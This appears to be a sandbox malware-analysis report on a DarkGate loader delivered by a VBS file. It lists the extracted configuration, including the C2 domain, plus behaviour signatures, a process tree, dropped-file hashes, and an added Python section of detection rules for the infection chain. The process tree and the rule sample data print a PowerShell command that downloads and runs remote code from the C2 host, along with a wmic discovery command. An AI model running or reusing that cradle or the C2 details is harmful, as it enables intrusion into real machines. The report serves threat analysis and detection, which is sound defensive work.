Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    10-12-2024 10:32

General

  • Target

    filter0912.2.vbs

  • Size

    250B

  • MD5

    0f5e506c6622ef23867764b600e2c4b4

  • SHA1

    e6b079ecc9537672cc3b8390b0509770045b9bbd

  • SHA256

    793b4e318eba9ef99173836a92ef2959a9ff73026647c0714ab7280f0dbe3fac

  • SHA512

    48fca5308d3a37a7ab974c299c689ce8122b355eb44fe8bc033c80481f73fe74c13586b122d8e86fcd4d26d24153e5a034a8e7262801e3716a2010cbbc8f0b85

Malware Config

Extracted

Family

darkgate

Botnet

drk3

C2

todayput.shop

Attributes
  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    sEhfQzVh

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    drk3

Signatures

  • DarkGate

    DarkGate is a loader and remote-access trojan with infostealer capabilities, written in Delphi; its payload is typically staged and decrypted by an AutoIt script, as in this run.

  • Darkgate family
  • Detect DarkGate stealer 7 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs

    Uses the AutoIt interpreter to run a compiled automation script.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs a command through powershell.exe.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    PID:2748
    • C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of WriteProcessMemory
      PID:624
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    PID:3940
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:4044
    • C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
      "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
      2⤵
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      PID:4820
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3196
    • C:\bhqs\yyii\Autoit3.exe
      "C:\bhqs\yyii\Autoit3.exe" C:\bhqs\yyii\script.a3x
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Executes dropped EXE
      • Command and Scripting Interpreter: AutoIT
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2272
      • \??\c:\windows\SysWOW64\cmd.exe
        "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hcbchdd\beecfkf
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ComputerSystem get domain
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4552
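The process tree above is the whole infection chain in three hops: WScript.exe runs the VBS, which launches a PowerShell download-and-evaluate cradle against todayput.shop, a dropped AutoIt3.exe executes script.a3x from C:\bhqs\yyii, and that stage shells out to wmic to write the machine's domain into C:\ProgramData. The following detection logic is an added example, not part of the sandbox report or of the malware: it encodes those three links as rules over process-creation events and, for every hit, walks the parent chain back to the root. The event field names (pid, ppid, image, parent_image, command_line) are assumed to mirror a Sysmon Event ID 1 record, the allow-list of directories from which AutoIt3 is treated as benign is an assumption, and the sample events are transcribed from the tree above plus one constructed benign control (PID 5000).

```python
"""Detection rules for the WScript -> PowerShell cradle -> AutoIt -> wmic chain.

Added example; not code from the sandbox or from the malware. Event field
names follow a Sysmon Event ID 1 record and are an assumption.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed allow-list: AutoIt3 started from one of these roots is treated as benign.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
FETCHERS = r"(invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|downloadstring)"
EVALS = r"(invoke-expression|\biex\b)"
# Download-and-eval cradle: an eval wrapped around a web fetch, in either order.
CRADLE_RE = re.compile(EVALS + r"[\s\S]*" + FETCHERS + "|" + FETCHERS + r"[\s\S]*" + EVALS, re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_host_download_cradle(ev: ProcEvent) -> bool:
    """Script host (WScript/CScript/mshta) spawning PowerShell that fetches and evals remote code."""
    return (basename(ev.parent_image) in SCRIPT_HOSTS
            and basename(ev.image) in {"powershell.exe", "pwsh.exe"}
            and CRADLE_RE.search(ev.command_line) is not None)


def autoit_outside_trusted_dirs(ev: ProcEvent) -> bool:
    """AutoIt interpreter run from an untrusted path with a compiled .a3x script."""
    img = ev.image.lower()
    return (basename(img).startswith("autoit3")
            and not img.startswith(TRUSTED_ROOTS)
            and ".a3x" in ev.command_line.lower())


def wmic_domain_to_staging_file(ev: ProcEvent) -> bool:
    """'wmic computersystem get domain' with its output redirected into a staging file."""
    cl = re.sub(r"\s+", " ", ev.command_line.lower())
    return ("computersystem get domain" in cl
            and re.search(r">\s*c:\\(programdata|users\\[^\\]+\\appdata|temp)\\", cl) is not None)


RULES = {
    "script_host_download_cradle": script_host_download_cradle,
    "autoit_outside_trusted_dirs": autoit_outside_trusted_dirs,
    "wmic_domain_to_staging_file": wmic_domain_to_staging_file,
}


def ancestry(ev: ProcEvent, by_pid: dict) -> list:
    """Walk ppid links to the root so an alert carries its parent chain (root first).
    Caveat: a process created with a spoofed parent shows the spoofed ppid here."""
    chain, cur, seen = [], ev, set()
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain[::-1]


def scan(events) -> list:
    """Return (rule, pid, ancestry) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    return [(name, ev.pid, ancestry(ev, by_pid))
            for ev in events for name, rule in RULES.items() if rule(ev)]


# Transcribed from the sandbox process tree, plus one constructed benign control (PID 5000).
SAMPLE_EVENTS = [
    ProcEvent(4712, 0, r"C:\Windows\System32\WScript.exe", "",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"'),
    ProcEvent(3196, 4712, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command '
              r"Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)"),
    ProcEvent(2272, 4712, r"C:\bhqs\yyii\Autoit3.exe", r"C:\Windows\System32\WScript.exe",
              r'"C:\bhqs\yyii\Autoit3.exe" C:\bhqs\yyii\script.a3x'),
    ProcEvent(908, 2272, r"C:\Windows\SysWOW64\cmd.exe", r"C:\bhqs\yyii\Autoit3.exe",
              r'"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hcbchdd\beecfkf'),
    ProcEvent(4552, 908, r"C:\Windows\SysWOW64\Wbem\WMIC.exe", r"C:\Windows\SysWOW64\cmd.exe",
              "wmic ComputerSystem get domain"),
    ProcEvent(5000, 1000, r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", r"C:\Windows\explorer.exe",
              r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" C:\Tools\build.a3x'),
]

if __name__ == "__main__":
    for rule, pid, chain in scan(SAMPLE_EVENTS):
        print(f"{rule:<30} pid={pid:<5} chain={' -> '.join(chain)}")
```

Run against the sample, the scan fires once per hop (PIDs 3196, 2272 and 908) and stays quiet on the WMIC.exe child, which has no redirect, and on the control AutoIt3 install under Program Files. The ancestry walk is only as trustworthy as the ppid field: the report flags NtCreateUserProcessOtherParentProcess on the Autoit3.exe node, so its recorded parent (WScript.exe) may not be the process that actually created it, and a chain built from ppid alone can be steered by the attacker.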

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\ProgramData\hcbchdd\beecfkf

          Filesize

          54B

          MD5

          c8bbad190eaaa9755c8dfb1573984d81

          SHA1

          17ad91294403223fde66f687450545a2bad72af5

          SHA256

          7f136265128b7175fb67024a6ddd7524586b025725a878c07d76a9d8ad3dc2ac

          SHA512

          05f02cf90969b7b9a2de39eecdf810a1835325e7c83ffe81388c9866c6f79be6cdc8617f606a8fedc6affe6127bede4b143106a90289bbb9bf61d94c648059df

        • C:\ProgramData\hcbchdd\kgfaagf

          Filesize

          1KB

          MD5

          319ff25b70e29a3310dde4e4d241f82b

          SHA1

          795cde9b62b8c0e25a2a2d4b5821ac06787b1632

          SHA256

          27b38046d4b6a02d22c16cdbde725b631b29b6bad2af7e0454d436abaa80c79a

          SHA512

          95ea94b96c6e5b7147e934f6633ee23acd9d6d45da7e781b8dce96bdf448feea8bd5bd5482d12ef2d422113d4d2e1b8f25eb922f59f6b4216e7a14c7d421a043

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jp4kyo3y.qy1.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\HAEKCch

          Filesize

          32B

          MD5

          a011babbccef95bd193744a0f5122550

          SHA1

          cfedfdb25d276b551a0cf5a8c6b6a45a7b695962

          SHA256

          d2934e6da2e5791a957fa7068db1057b42b40f56074912b66a9917b746dd07c2

          SHA512

          5b1200823845167f4ccdcf8a92848cd9e76a14ba383df23264a8cd5e171b77d2fd3f8f26631f94c514829761be2200bf4bdc67c11ba39faa7075640f4d9d5be8

        • C:\bhqs\yyii\Autoit3.exe

          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        • C:\bhqs\yyii\script.a3x

          Filesize

          581KB

          MD5

          2bf27a4ef77513aa86659950f589a089

          SHA1

          e5238f7403f90cc1998f312504707c86585f9da5

          SHA256

          fce2d534623887f17922412cd8b9e4313a695db76573d69dda0f2693b3a0353f

          SHA512

          3c599dc4b5b88966f4657130324d122191500e1ecf4ac912a7c7d31c3d35b2fab9e951831484b63e4d0cfcaabfc7a305e4b91c448533fc1f2e2d4f6ad30fdb9d

        • C:\temp\acbhded

          Filesize

          4B

          MD5

          3dd7326471f0ce39b622289fc316b50a

          SHA1

          e6d00cd0e630c9c894ed7b723706f7f65213e898

          SHA256

          cec38cb7894fdd48d59b3e2c0b56635d7c58aafb11e12c6201c8dca67e386320

          SHA512

          67f73896221028ca04867ec99e03f86f85cc410a6d2fa5dca66a5211923797e6bdba25caf0289f4e345597410f78fd489405072fab2e778c83477da885da672a

        • C:\temp\fkehffh

          Filesize

          4B

          MD5

          24a941443055434988585baf9070ad0b

          SHA1

          4e712ed1b882ec06d4141d9a6678a65a8acdcdac

          SHA256

          5865015c6c841756179d356bed2d00c8a57c589e7798e71e939e84556f9c645f

          SHA512

          c0d18bf171c83c4b2398ab3bb7f02fc29e6af21a1cb3cd56af42acb3239e61e9ae7500e9b1d92c21ba5562e83666ee78da2256f1d38189d7c79950000b7c73c6

        • C:\temp\fkehffh

          Filesize

          4B

          MD5

          537151830d88d35fac209d60183b2326

          SHA1

          c0014036cdfe32daba364e91c74438a00e93b0fb

          SHA256

          81092cb0748a0c10bf5490b14879c8d06a5f1fa486fdc43494cb0013c26d3ebf

          SHA512

          55323f9f60ecfa875386d53d9f86b404dcf02e035fcdeb2fac26aaf71f24c6607d35881836a9519a28aced76ce2b2f728b9fa1bcf2239735f8746848d739e1aa

        • memory/624-53-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-50-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-52-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-49-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-51-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/624-43-0x00000000026E0000-0x0000000002E82000-memory.dmp

          Filesize

          7.6MB

        • memory/3196-15-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-17-0x000002377D590000-0x000002377D59A000-memory.dmp

          Filesize

          40KB

        • memory/3196-13-0x000002377DB40000-0x000002377DD02000-memory.dmp

          Filesize

          1.8MB

        • memory/3196-0-0x00007FFB5E6D3000-0x00007FFB5E6D5000-memory.dmp

          Filesize

          8KB

        • memory/3196-25-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-16-0x000002377D930000-0x000002377D942000-memory.dmp

          Filesize

          72KB

        • memory/3196-10-0x000002377D5C0000-0x000002377D5E2000-memory.dmp

          Filesize

          136KB

        • memory/3196-12-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/3196-11-0x00007FFB5E6D0000-0x00007FFB5F191000-memory.dmp

          Filesize

          10.8MB

        • memory/4820-54-0x0000000002600000-0x0000000002DA2000-memory.dmp

          Filesize

          7.6MB